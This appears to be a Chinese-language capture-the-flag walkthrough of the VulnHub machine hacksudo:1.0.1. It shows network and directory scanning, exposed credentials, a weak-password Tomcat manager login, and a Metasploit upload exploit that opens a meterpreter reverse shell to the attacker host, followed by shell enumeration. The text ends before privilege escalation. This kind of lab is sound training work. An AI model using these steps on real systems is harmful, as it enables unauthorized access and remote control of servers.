靶机渗透练习93-hacksudo:1.0.1

靶机描述

靶机地址:https://www.vulnhub.com/entry/hacksudo-101,650/

Description

N/A

This works better with VirtualBox rather than VMware ## Changelog 2021-04-04 - v1.0.1 2021-02-22 - v1.0.0

一、搭建靶机环境

攻击机Kali

IP地址:192.168.9.3

靶机

IP地址:192.168.9.12

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

⬢  hacksudo: 1.0.1  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.3
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.1     0a:00:27:00:00:12       (Unknown: locally administered)
192.168.9.1     08:00:27:6a:50:3c       PCS Systemtechnik GmbH (DUP: 2)
192.168.9.12    08:00:27:64:fc:b9       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.036 seconds (125.74 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、fping -aqg 指定网段

fping -aqg 192.168.9.0/24

⬢  hacksudo: 1.0.1  fping -aqg 192.168.9.0/24
192.168.9.1
192.168.9.3
192.168.9.12
方法五、待补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  hacksudo: 1.0.1  nmap -A -sV -T4 -p- 192.168.9.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 09:34 CST
Nmap scan report for bogon (192.168.9.12)
Host is up (0.0017s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Hacksudo | shops
|_http-server-header: Apache/2.4.46 (Ubuntu)
2222/tcp open  ssh     OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3a:83:d2:9a:7c:65:ff:16:91:9b:ec:2b:93:74:90:e9 (RSA)
|   256 47:98:2c:ba:49:b3:0f:3b:35:b3:22:c6:21:9c:bf:c9 (ECDSA)
|_  256 a1:96:b1:98:65:fb:1f:f8:b5:57:d1:2a:30:b3:12:b1 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
MAC Address: 08:00:27:64:FC:B9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.68 ms bogon (192.168.9.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.10 seconds

开放了80,2222,8080端口

2222端口对应ssh服务

8080是个tomcat

2.2枚举漏洞

2.2.1 80 端口分析

访问:http://192.168.9.12/

image-20220505094420890

发现两个表单,左边登录右边注册

尝试注册新用户,出现报错

image-20220505094924011

该错误表明该站点功能不完整,但我们的记录已成功创建

还没反应过来,又来一个弹窗

image-20220505095004222

随便输入一下,出现新的错误回显

image-20220505095037549

咱们先去扫描一下目录,是否有其他目录

⬢  hacksudo: 1.0.1  dirsearch -u http://192.168.9.12                                                                        

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.9.12/_22-05-05_09-48-02.txt

Error Log: /root/.dirsearch/logs/errors-22-05-05_09-48-02.log

Target: http://192.168.9.12/

[09:48:02] Starting: 
[09:48:02] 301 -  311B  - /html  ->  http://192.168.9.12/html/
[09:48:09] 403 -  277B  - /.ht_wsr.txt
[09:48:09] 403 -  277B  - /.htaccessOLD2
[09:48:09] 403 -  277B  - /.htaccess.bak1
[09:48:09] 403 -  277B  - /.html
[09:48:09] 403 -  277B  - /.htaccess.sample
[09:48:09] 403 -  277B  - /.htaccess.save
[09:48:09] 403 -  277B  - /.htaccess.orig
[09:48:09] 403 -  277B  - /.htaccess_extra
[09:48:09] 403 -  277B  - /.htaccess_orig
[09:48:09] 403 -  277B  - /.htaccess_sc
[09:48:09] 403 -  277B  - /.htaccessOLD
[09:48:09] 403 -  277B  - /.htaccessBAK
[09:48:09] 403 -  277B  - /.htm
[09:48:09] 403 -  277B  - /.htpasswd_test
[09:48:09] 403 -  277B  - /.htpasswds
[09:48:09] 403 -  277B  - /.httr-oauth
[09:48:27] 200 -    1KB - /LICENSE
[09:48:28] 200 -  469B  - /README.md
[09:48:39] 200 -  940B  - /add.php
[09:48:41] 200 -    2KB - /admin.php
[09:49:19] 200 -    2KB - /cart.html
[09:49:24] 200 -  592B  - /config.php
[09:49:31] 301 -  310B  - /css  ->  http://192.168.9.12/css/
[09:49:35] 200 -  519B  - /delete.php
[09:49:52] 200 -    2KB - /html/
[09:49:55] 200 -    2KB - /index.php
[09:49:56] 200 -  162B  - /info.txt
[09:50:06] 200 -  922B  - /log.php
[09:50:47] 301 -  314B  - /scripts  ->  http://192.168.9.12/scripts/
[09:50:48] 200 -    1KB - /scripts/
[09:50:48] 200 -    5KB - /search.php
[09:50:50] 403 -  277B  - /server-status/
[09:50:50] 403 -  277B  - /server-status
[09:50:55] 200 -  696B  - /signup.php
[09:51:13] 200 -    2KB - /users.sql

Task Completed

访问:http://192.168.9.12/add.php

alert("New product added. Add more!");'; header("Location:http://192.168.0.6/JIU/add_product.php"); } else { echo ''; header("Location:http://192.168.0.6/JIU/add_product.php"); } ?> 

访问:http://192.168.9.12/admin.php

image-20220505095451163

一番寻找,没有找到可以利用的

访问:http://192.168.9.12/config.php

12, 'Service Tax' => 5 ); //connect to MySql $mysqli = new mysqli($db_host, $db_username, $db_password,$db_name); if ($mysqli->connect_error) { die('Error : ('. $mysqli->connect_errno .') '. $mysqli->connect_error); } ?> 

访问:http://192.168.9.12/delete.php

image-20220505100014434

alert("Product Deleted");'; header("Location:http://localhost/JIU/remove_product.php"); } else { echo ''; header("Location:http://localhost/JIU/remove_product.php"); } ?> 

访问:http://192.168.9.12/info.txt

Home Page: index.php

Database Name: online
Tables: products.sql
	users.sql


User Accounts:

Email				Password
jimit@example.com		100596
admin@example.com		admin

这里咱们发现了两个数据库文件名products.sql,users.sql

以及两组用户密码jimit@example.com&100596admin@example.com &admin

访问:http://192.168.9.12/log.php

alert("Wrong password"); '; } } if(isset($_SESSION['username'])){ $uname=$_SESSION['username']; if($uname=='admin@example.com'){ header("Location: admin.php"); } else header("Location: fandom.php"); } function filter($str) { trim($str); htmlspecialchars($str); return($str); } ?>

访问:http://192.168.9.12/users.sql

保存文件打开

-- phpMyAdmin SQL Dump
-- version 4.5.1
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Oct 18, 2016 at 06:22 PM
-- Server version: 10.1.16-MariaDB
-- PHP Version: 5.6.24

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `online`
--

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

CREATE TABLE `users` (
  `id` int(11) NOT NULL,
  `fname` varchar(100) NOT NULL,
  `lname` varchar(100) NOT NULL,
  `phone` bigint(10) NOT NULL,
  `email` varchar(50) NOT NULL,
  `password` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`id`, `fname`, `lname`, `phone`, `email`, `password`) VALUES
(16, 'Jimit', 'Dholakia', 12345678, 'jimit@example.com', 'b15fbfaac3776e5a2ad330fbf7976da7'),
(17, 'Admin', 'Admin', 12345, 'admin@example.com', '21232f297a57a5a743894a0e4a801fc3');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=19;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

发现密码,不知道是不是加密的

拿去md5解一下看看

b15fbfaac3776e5a2ad330fbf7976da7解密得到1000596

21232f297a57a5a743894a0e4a801fc3解密得到admin

与之前得到的明文密码一样,说明是没问题的

既然这个sql文件能下载,那前面的那products.sql文件也能下载

下载该文件查看内容

-- phpMyAdmin SQL Dump
-- version 4.5.1
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Oct 18, 2016 at 06:21 PM
-- Server version: 10.1.16-MariaDB
-- PHP Version: 5.6.24

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `online`
--

-- --------------------------------------------------------

--
-- Table structure for table `products`
--

CREATE TABLE `products` (
  `id` int(11) NOT NULL,
  `product_code` varchar(25) NOT NULL,
  `fandom` varchar(25) NOT NULL,
  `category` varchar(25) NOT NULL,
  `product_img_name` varchar(100) NOT NULL DEFAULT 'no_image.jpg',
  `product_name` varchar(100) NOT NULL,
  `price` int(5) NOT NULL,
  `product_qty` int(2) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `products`
--

INSERT INTO `products` (`id`, `product_code`, `fandom`, `category`, `product_img_name`, `product_name`, `price`, `product_qty`) VALUES
(1, 'got-cloth-1', 'Game of Thrones', 'Clothing', 'got-cloth-1.jpg', '[T-shirt] The North Remembers', 500, 99),
(2, 'got-cloth-2', 'Game of Thrones', 'Clothing', 'got-cloth-2.jpg', '[T-shirt] King in the North', 500, 99),
(3, 'got-cloth-3', 'Game of Thrones', 'Clothing', 'got-cloth-3.jpg', '[T-shirt] Hodor', 500, 99),
(4, 'got-cloth-4', 'Game of Thrones', 'Clothing', 'got-cloth-4.jpg', 'Hoodie', 750, 99),
(5, 'got-cloth-5', 'Game of Thrones', 'Clothing', 'got-cloth-5.jpg', '[T-shirt] The Direwolves', 500, 99),
(6, 'got-cloth-6', 'Game of Thrones', 'Clothing', 'got-cloth-6.jpg', '[T-shirt] The Lannisters Send Their Regards', 500, 99),
(7, 'got-acc-1', 'Game of Thrones', 'Accessories', 'got-acc-1.jpg', 'Targaryen Necklace', 350, 99),
(8, 'got-acc-2', 'Game of Thrones', 'Accessories', 'got-acc-2.jpg', 'Direwolf Necklace', 350, 99),
(9, 'got-acc-3', 'Game of Thrones', 'Accessories', 'got-acc-3.jpg', 'Stark Necklace', 350, 99),
(10, 'got-acc-4', 'Game of Thrones', 'Accessories', 'got-acc-4.jpg', 'Armour Ring', 350, 99),
(11, 'got-sou-1', 'Game of Thrones', 'Souvenir', 'got-sou-1.jpg', 'Jon Snow Pendrive', 400, 99),
(12, 'got-sou-2', 'Game of Thrones', 'Souvenir', 'got-sou-2.jpg', 'Tyrion Pendrive', 400, 99),
(13, 'got-sou-3', 'Game of Thrones', 'Souvenir', 'got-sou-3.jpg', 'Dragon Pendrive', 400, 99),
(14, 'got-sou-4', 'Game of Thrones', 'Souvenir', 'got-sou-4.jpg', 'Arya Stark Pendrivee', 400, 99),
(15, 'got-sou-5', 'Game of Thrones', 'Souvenir', 'got-sou-5.jpg', 'Darnerys Pendrive', 400, 99),
(16, 'got-sou-6', 'Game of Thrones', 'Souvenir', 'got-sou-6.jpg', 'Winterfell Glass', 600, 99),
(17, 'got-sou-7', 'Game of Thrones', 'Souvenir', 'got-sou-7.jpg', 'Castle Black Glass', 600, 99),
(18, 'got-sou-8', 'Game of Thrones', 'Souvenir', 'got-sou-8.jpg', 'Winterfell Mug', 600, 99),
(19, 'hg-cloth-01', 'Hunger Games', 'Clothing', 'hg-cloth-01.jpg', '[T-shirt] The Girl on Fire', 500, 99),
(20, 'hg-cloth-02', 'Hunger Games', 'Clothing', 'hg-cloth-02.jpg', '[T-shirt] Real or Not Real', 500, 99),
(21, 'hg-cloth-03', 'Hunger Games', 'Clothing', 'hg-cloth-03.jpg', '[T-shirt] The Hanging Tree', 500, 99),
(22, 'hg-cloth-04', 'Hunger Games', 'Clothing', 'hg-cloth-04.jpg', '[T-shirt] May the odds be ever in your favor', 500, 99),
(23, 'hg-cloth-05', 'Hunger Games', 'Clothing', 'hg-cloth-05.jpg', '[T-shirt] Calm Down Bro', 500, 99),
(24, 'hg-cloth-06', 'Hunger Games', 'Clothing', 'hg-cloth-06.jpg', '[T-shirt]The 75th Annual Hunger Games', 500, 99),
(25, 'hg-acc-01', 'Hunger Games', 'Accessories', 'hg-acc-01.jpg', 'Mockingjay Bracelet', 350, 99),
(26, 'hg-acc-02', 'Hunger Games', 'Accessories', 'hg-acc-02.jpg', 'Real or Not Real? Pendant', 350, 99),
(27, 'hg-acc-03', 'Hunger Games', 'Accessories', 'hg-acc-03.jpg', 'Mockingjay Earrings', 350, 99),
(28, 'hg-acc-04', 'Hunger Games', 'Accessories', 'hg-acc-04.jpg', 'Katniss Arrow Earrings', 350, 99),
(29, 'hg-sou-01', 'Hunger Games', 'Souvenir', 'hg-sou-01.png', 'Hunger Games Mug', 250, 99),
(30, 'hg-sou-02', 'Hunger Games', 'Souvenir', 'hg-sou-02.jpg', 'Katniss Tote Bag', 500, 99),
(31, 'hg-sou-03', 'Hunger Games', 'Souvenir', 'hg-sou-03.jpg', 'Mockingjay Iphone Cover', 300, 99),
(32, 'hg-sou-04', 'Hunger Games', 'Souvenir', 'hg-sou-04.jpg', 'Girl on Fire Pillow Cover', 200, 99),
(33, 'hp-cloth-1', 'Harry Potter', 'Clothing', 'hp-cloth-1.jpg', '[T-shirt] Hogwarts Alumni', 500, 99),
(34, 'hp-cloth-2', 'Harry Potter', 'Clothing', 'hp-cloth-2.jpg', '[T-shirt] Hogwarts', 500, 99),
(35, 'hp-cloth-3', 'Harry Potter', 'Clothing', 'hp-cloth-3.jpg', '[T-shirt] Deathly Hollows', 500, 99),
(36, 'hp-cloth-4', 'Harry Potter', 'Clothing', 'hp-cloth-4.jpg', '[T-shirt] Gryffindor', 500, 99),
(37, 'hp-cloth-5', 'Harry Potter', 'Clothing', 'hp-cloth-5.jpg', '[T-shirt] Ravenclaw', 500, 99),
(38, 'hp-cloth-6', 'Harry Potter', 'Clothing', 'hp-cloth-6.jpg', '[T-shirt] Slytherin', 500, 99),
(39, 'hp-cloth-7', 'Harry Potter', 'Clothing', 'hp-cloth-7.jpg', '[T-shirt] Hufflepuff', 500, 99),
(40, 'hp-acc-1', 'Harry Potter', 'Accessories', 'hp-acc-1.jpg', 'Deathly Hollows Pendant', 350, 99),
(41, 'hp-acc-2', 'Harry Potter', 'Accessories', 'hp-acc-2.jpg', 'Time Turn Earings', 350, 99),
(42, 'hp-acc-3', 'Harry Potter', 'Accessories', 'hp-acc-3.jpg', 'Deathly Hollows Ring', 350, 99),
(43, 'hp-acc-7', 'Harry Potter', 'Accessories', 'hp-acc-7.jpg', 'Snitch Necklace', 350, 99),
(44, 'hp-acc-8', 'Harry Potter', 'Accessories', 'hp-acc-8.jpg', 'Snitch Earings', 350, 99),
(45, 'hp-acc-9', 'Harry Potter', 'Accessories', 'hp-acc-9.jpg', 'Bracelet', 350, 99),
(46, 'hp-sou-1', 'Harry Potter', 'Souvenir', 'hp-sou-1.jpg', 'Hogwarts Mug', 450, 99),
(47, 'hp-sou-1', 'Harry Potter', 'Souvenir', 'hp-sou-2.jpg', 'Marauders Map Mug ', 250, 99),
(48, 'hp-sou-1', 'Harry Potter', 'Souvenir', 'hp-sou-3.jpg', 'Harry Potter Mobile Case', 300, 99),
(49, 'hp-sou-1', 'Harry Potter', 'Souvenir', 'hp-sou-4.jpg', 'Marauders Map Mobile Case', 250, 99),
(50, 'hp-sou-1', 'Harry Potter', 'Souvenir', 'hp-sou-5.jpg', 'Deathly Hollows Mobile Case', 250, 99);

--
-- Indexes for dumped tables
--

--
-- Indexes for table `products`
--
ALTER TABLE `products`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `products`
--
ALTER TABLE `products`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=53;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

好像并没有什么用处

到这里好像还是没找到突破口,换个扫描工具扫一下目录看看,是否有遗漏的

⬢  hacksudo: 1.0.1  gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.9.12 -x php,html,txt,zip,bak 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.12
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bak,php,html,txt,zip
[+] Timeout:                 10s
===============================================================
2022/05/05 09:47:11 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2550]
/search.php           (Status: 200) [Size: 5296]
/info.txt             (Status: 200) [Size: 162] 
/html                 (Status: 301) [Size: 311] [--> http://192.168.9.12/html/]
/signup.php           (Status: 200) [Size: 696]                                
/scripts              (Status: 301) [Size: 314] [--> http://192.168.9.12/scripts/]
/admin.php            (Status: 200) [Size: 1925]                                  
/cart.html            (Status: 200) [Size: 2344]                                  
/add.php              (Status: 200) [Size: 940]                                   
/css                  (Status: 301) [Size: 310] [--> http://192.168.9.12/css/]    
/log.php              (Status: 200) [Size: 922]                                   
/hp.php               (Status: 200) [Size: 9676]                                  
/query.txt            (Status: 200) [Size: 185]                                   
/pro.php              (Status: 200) [Size: 914]                                   
/config.php           (Status: 200) [Size: 592]                                   
/res                  (Status: 301) [Size: 310] [--> http://192.168.9.12/res/]    
/LICENSE              (Status: 200) [Size: 1071]                                  
/delete.php           (Status: 200) [Size: 519]                                   
/inventory.php        (Status: 200) [Size: 2808]                                  
/hg.php               (Status: 200) [Size: 9672]                                  
/view_cart.php        (Status: 200) [Size: 3039]                                  
/fandom.php           (Status: 200) [Size: 1464]                                  
/got.php              (Status: 200) [Size: 9696]                                  
/add_product.php      (Status: 200) [Size: 3243]                                  
/server-status        (Status: 403) [Size: 277]                                   
/flag1.txt            (Status: 200) [Size: 12]                                    
                                                                                  
===============================================================
2022/05/05 09:52:02 Finished
===============================================================

访问:http://192.168.9.12/query.txt

INSERT INTO `products`(`product_code`, `fandom`, `category`, `product_img_name`, `product_name`, `price`) VALUES ('got-cloth-3','got','clothing','got-cloth-3.jpg','[T-shirt] Hodor',500)

访问:http://192.168.9.12/flag1.txt

level up 1!

这算是拿到flag1了吗?

其他的也没啥了

2.2.2 8080端口分析

既然80端口没有突破口,换8080看看

访问:http://192.168.9.12:8080/

image-20220505102749255

发现是tomcat的管理界面,尝试使用弱口令登录webapp

用户名``admin`

密码admin

image-20220505102921196

发现居然登录成功了

image-20220505102947661

既然咱们可以访问 webapp,我现在应该找到一种方法将反向 shell 代码注入目标。

一个简单的方法是启动 metasploit 框架并使用与 Tomcat 管理器相关的漏洞利用。

另一种方法是使用WAR文件部署应用程序

这里咱们可以参考HackTricks

2.3漏洞利用

2.3.1 方法一:Metasploit

⬢  hacksudo: 1.0.1  msfconsole -q
msf6 > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set

Global
======

No entries in data store.

Module: multi/http/tomcat_mgr_upload
====================================

  Name                          Value
  ----                          -----
  ContextInformationFile
  DOMAIN                        WORKSTATION
  DigestAuthIIS                 true
  DisablePayloadHandler         false
  EXE::Custom
  EXE::EICAR                    false
  EXE::FallBack                 false
  EXE::Inject                   false
  EXE::OldMethod                false
  EXE::Path
  EXE::Template
  EnableContextEncoding         false
  FingerprintCheck              true
  HTTP::header_folding          false
  HTTP::method_random_case      false
  HTTP::method_random_invalid   false
  HTTP::method_random_valid     false
  HTTP::pad_fake_headers        false
  HTTP::pad_fake_headers_count  0
  HTTP::pad_get_params          false
  HTTP::pad_get_params_count    16
  HTTP::pad_method_uri_count    1
  HTTP::pad_method_uri_type     space
  HTTP::pad_post_params         false
  HTTP::pad_post_params_count   16
  HTTP::pad_uri_version_count   1
  HTTP::pad_uri_version_type    space
  HTTP::uri_dir_fake_relative   false
  HTTP::uri_dir_self_reference  false
  HTTP::uri_encode_mode         hex-normal
  HTTP::uri_fake_end            false
  HTTP::uri_fake_params_start   false
  HTTP::uri_full_url            false
  HTTP::uri_use_backslashes     false
  HTTP::version_random_invalid  false
  HTTP::version_random_valid    false
  HttpClientTimeout
  HttpPassword
  HttpRawHeaders
  HttpTrace                     false
  HttpTraceColors               red/blu
  HttpTraceHeadersOnly          false
  HttpUsername
  LHOST                         192.168.128.128
  MSI::Custom
  MSI::EICAR                    false
  MSI::Path
  MSI::Template
  MSI::UAC                      false
  PAYLOAD                       java/meterpreter/reverse_tcp
  Proxies
  RHOSTS
  RPORT                         80
  SSL                           false
  SSLVersion                    Auto
  TARGETURI                     /manager
  UserAgent                     Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
  VERBOSE                       false
  VHOST
  WORKSPACE
  WfsDelay                      2

msf6 exploit(multi/http/tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.128.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 192.168.9.3
LHOST => 192.168.9.3
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOST 192.168.9.12
RHOST => 192.168.9.12
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.9.12     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         8080             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.9.3      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/tomcat_mgr_upload) > set HTTPUSERNAME admin
HTTPUSERNAME => admin
msf6 exploit(multi/http/tomcat_mgr_upload) > set HTTPPASSWORD admin
HTTPPASSWORD => admin
msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.9.3:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying NYuAg...
[*] Executing NYuAg...
[*] Undeploying NYuAg ...
[*] Sending stage (58829 bytes) to 192.168.9.12
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (192.168.9.3:4444 -> 192.168.9.12:60430 ) at 2022-05-05 10:46:44 +0800

meterpreter > 

成功拿到shell

2.2.2 方法二:上传war包

这个是最基本的一个方法

主要步骤是

打包一个反弹shellwar包>通过webapp上传该包>然后通过基本方式进行Getshell

2.4权限提升

2.4.1 信息收集

先输入shell进入交互式shell,然后提升到TTYshell,再进行信息收集

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=1003(tomcat) gid=1003(tomcat) groups=1003(tomcat)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")';
tomcat@hacksudo:/$ ls
ls
bin    dev   lib    libx32      mnt   root  snap      sys  var
boot   etc   lib32  lost+found  opt   run   srv       tmp
cdrom  home  lib64  media       proc  sbin  swap.img  usr
tomcat@hacksudo:/$ cd home
cd home
tomcat@hacksudo:/home$ ls
ls
hacksudo  vishal
tomcat@hacksudo:/home$ cd hacksudo 
cd hacksudo
tomcat@hacksudo:/home/hacksudo$ ls -al
ls -al
total 80
drwxr-xr-x 4 hacksudo hacksudo  4096 Jan 29  2021 .
drwxr-xr-x 4 root     root      4096 Jan 23  2021 ..
-r-------- 1 hacksudo hacksudo     0 Jan 28  2021 .bash_history
-rw-r--r-- 1 hacksudo hacksudo   220 Jun 18  2020 .bash_logout
-rw-r--r-- 1 hacksudo hacksudo  3771 Jun 18  2020 .bashrc
drwx------ 2 hacksudo hacksudo  4096 Jan 22  2021 .cache
-r-xr----x 1 hacksudo hacksudo 16704 Jan 28  2021 get
-rwxr-xr-x 1 hacksudo hacksudo 16704 Jan 28  2021 getmanager
-rwx------ 1 hacksudo hacksudo   237 Jan 29  2021 level3.sh
drwxrwxr-x 3 hacksudo hacksudo  4096 Jan 25  2021 .local
-rw-r--r-- 1 hacksudo hacksudo   807 Jun 18  2020 .profile
-rw-rw-r-- 1 hacksudo hacksudo    66 Jan 26  2021 .selected_editor
-rw-r--r-- 1 hacksudo hacksudo     0 Jan 22  2021 .sudo_as_admin_successful
-r-------- 1 hacksudo hacksudo    33 Jan 27  2021 user.txt
tomcat@hacksudo:/home/hacksudo$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
tomcat@hacksudo:/home/hacksudo$ cd ..
cd ..
tomcat@hacksudo:/home$ ls 
ls
hacksudo  vishal
tomcat@hacksudo:/home$ cd vishal
cd vishal
tomcat@hacksudo:/home/vishal$ ls
ls
employee  flag2.txt  level2.sh  manager  office
tomcat@hacksudo:/home/vishal$ ls -al
ls -al
total 56
drwxr-xr-x 8 vishal vishal 4096 Jan 29  2021 .
drwxr-xr-x 4 root   root   4096 Jan 23  2021 ..
-r-------- 1 vishal vishal    0 Jan 28  2021 .bash_history
-rw-r--r-- 1 vishal vishal  220 Jan 23  2021 .bash_logout
-rw-r--r-- 1 vishal vishal 3771 Jan 23  2021 .bashrc
drwx------ 2 vishal vishal 4096 Jan 23  2021 .cache
drwxr-xr-x 2 root   root   4096 Jan 26  2021 employee
-rw-r--r-- 1 vishal vishal   13 Jan 28  2021 flag2.txt
-rwx------ 1 vishal vishal  163 Jan 29  2021 level2.sh
drwxrwxr-x 3 vishal vishal 4096 Jan 25  2021 .local
drwxrwx--- 2 root   root   4096 Jan 29  2021 manager
drwxrwxr-x 2 vishal vishal 4096 Mar 30  2021 office
-rw-r--r-- 1 vishal vishal  807 Jan 23  2021 .profile
-rw-rw-r-- 1 vishal vishal   66 Jan 26  2021 .selected_editor
drwx------ 2 vishal vishal 4096 Jan 26  2021 .ssh
-rw-r--r-- 1 vishal vishal    0 Jan 26  2021 .sudo_as_admin_successful

两个用户目录下都有不少文件,并且看到了需要的user.txtflag2.txt

可惜并没有权限查看,咱们去网站目录文件夹看看有什么东西

tomcat@hacksudo:/home/vishal$ cd /var/www
cd /var/www
